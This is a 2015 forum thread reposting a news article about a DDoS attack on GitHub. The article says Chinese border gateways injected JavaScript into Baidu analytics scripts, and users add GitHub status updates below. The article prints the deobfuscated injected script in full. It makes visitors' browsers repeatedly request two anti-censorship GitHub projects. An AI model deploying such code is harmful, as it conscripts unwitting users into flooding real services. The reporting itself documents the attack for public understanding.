Reefa Posted March 27, 2015

GitHub's servers are being hammered by web traffic from an army of unwitting cyber-foot-soldiers. It appears when thousands of people visit websites that serve ads and tracking code from Baidu – China's answer to Google – from outside the Middle Kingdom, network gateways on the Chinese border silently inject a JavaScript function into those websites' pages.

This simple code instructs browsers to stealthily connect to GitHub.com every two seconds, creating "an extremely large amount of traffic," the San Francisco-based upstart said.

The JS specifically targets two GitHub-hosted projects – Greatfire and CN-NYTimes – which help Chinese citizens circumvent The Great Firewall Of China. The firewall blocks things like VPNs and censors web traffic, hiding information on the Tiananmen Square massacre and so on.

GitHub said on Friday that the bursts in traffic, effectively a string of distributed denial-of-service attacks, are causing intermittent outages.

"We're aware that GitHub.com is intermittently unavailable for some users during the ongoing DDoS," GitHub said in a status update at 1549 UTC today. "Restoring service for all users while deflecting attack traffic is our number one priority. We've deployed our volumetric attack defenses against an extremely large amount of traffic. Performance is stabilizing."

Hours earlier, the biz noted: "We've been under continuous DDoS attack for 24+ hours. The attack is evolving, and we're all hands on deck mitigating."

[Image caption: The outage ... GitHub's status updates today]

According to a security researcher at Insight Labs, HTTP requests to hm.baidu.com/h.js are being hijacked by China's border gateways, which insert some semi-obfuscated JavaScript to attack the aforementioned GitHub repositories.
The injected script looks like this, once unscrambled:

// Load jQuery from Baidu's CDN, falling back to jquery.com if that fails.
document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
// The two GitHub projects named in the article; one is picked by the current second.
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;
function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}
function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            // Re-arm after each response until five minutes (3E5 ms) have passed since load.
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}
function r_send(a) {
    setTimeout("r_send2()", a)
}
// First request two seconds after the page loads.
setTimeout("r_send2()", 2E3);

The Greatfire project provides links to cloud-hosted mirrors of websites – such as the BBC and Google's Blogger – that Chinese people can use to dodge the Great Firewall. While BBC.com is blocked, a cache of the broadcaster's pages on cloudfront.net is not, it seems.
CN-NYTimes similarly mirrors the New York Times.

"A certain device at the border of China's inner network and the Internet has hijacked the HTTP connections went into China, replaced some javascript files from Baidu with malicious ones that would load [the GitHub pages] every two seconds," Insight Labs' Anthr@x wrote. "In other words, even people outside China are being weaponized to target things the Chinese government does not like, for example, freedom of speech."

While there is no proof that the Chinese government was directly involved in the assault, other researchers, such as F-Secure's Mikko Hypponen, noted that someone, state or otherwise, wants these projects silenced.

http://www.theregister.co.uk/2015/03/27/github_under_fire_from_weaponized_great_firewall/
knowledge-Spammer Posted March 28, 2015

nice bit of code but not nice people
Joe13 Posted March 28, 2015

https://status.github.com/
2:30 UTC The ongoing DDoS attack has shifted to include Pages and assets. We are updating our defenses to match.
Reefa Posted March 28, 2015 (Author)

Quoting Joe13:
    https://status.github.com/
    2:30 UTC The ongoing DDoS attack has shifted to include Pages and assets. We are updating our defenses to match.

Cheers for the update on the story mate. ;)
Joe13 Posted March 28, 2015

Large Scale DDoS Attack on github.com
jnewland

We are currently experiencing the largest DDoS (distributed denial of service) attack in github.com's history. The attack began around 2AM UTC on Thursday, March 26, and involves a wide combination of attack vectors. These include every vector we've seen in previous attacks as well as some sophisticated new techniques that use the web browsers of unsuspecting, uninvolved people to flood github.com with high levels of traffic. Based on reports we've received, we believe the intent of this attack is to convince us to remove a specific class of content.

We are completely focused on mitigating this attack. Our top priority is making sure github.com is available to all our users while deflecting malicious traffic. Please watch our status site or follow @githubstatus on Twitter for real-time updates.
Joe13 Posted March 29, 2015

10:53 UTC Services are stable as we continue to mitigate against a large scale DDoS attack.
Joe13 Posted March 29, 2015

19:25 UTC We've adjusted our mitigation tactics and are observing improved TCP performance for the majority of non-attack traffic.
CODYQX4 Posted March 30, 2015

The code is actually very simple, and a JavaScript 101 person could write something of similar function. Just a loop via setTimeout to suck down the URL via Web Request.

The real alarming thing here is, if you pull any code at all from China, you are vulnerable to their Government tampering with it. I'm sure most nations have this capability, but this is confirmed fact that the Chinese government uses us as DDOS pawns.

Good thing I use stuff like uBlock, no crappy ad injection code from any country in my browser.
Joe13 Posted March 30, 2015

Today 6:46 UTC The DDoS attack has evolved and we are working to mitigate.
0:38 UTC All systems reporting at 100%. Attack traffic continues, so we remain on high alert.